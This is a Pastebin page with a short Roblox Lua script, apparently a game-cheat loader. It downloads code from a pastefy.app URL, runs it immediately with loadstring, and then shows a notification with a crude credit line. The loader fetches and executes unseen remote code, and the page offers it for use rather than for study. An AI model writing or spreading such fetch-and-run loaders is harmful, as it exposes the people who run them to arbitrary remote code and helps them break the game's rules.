Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- Function to show notification
- local function showNotification()
- local CoreGui = game:GetService("CoreGui")
- local NotificationService = require(CoreGui:WaitForChild("RobloxGui"):WaitForChild("Notification"))
- NotificationService:Fire({
- Title = "HEY BROTHER!",
- Text = "Credit to the owner of jerk off",
- Duration = 5 -- Duration of the notification in seconds
- })
- end
- -- Loadstring to execute
- local codeToExecute = [[ loadstring(game:HttpGet("https://pastefy.app/wa3v2Vgm/raw"))("Spider Script")
- ]]
- -- Execute loadstring
- local success, result = pcall(function()
- loadstring(codeToExecute)() -- Executes the provided code
- end)
- -- Show the notification after executing
- showNotification()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement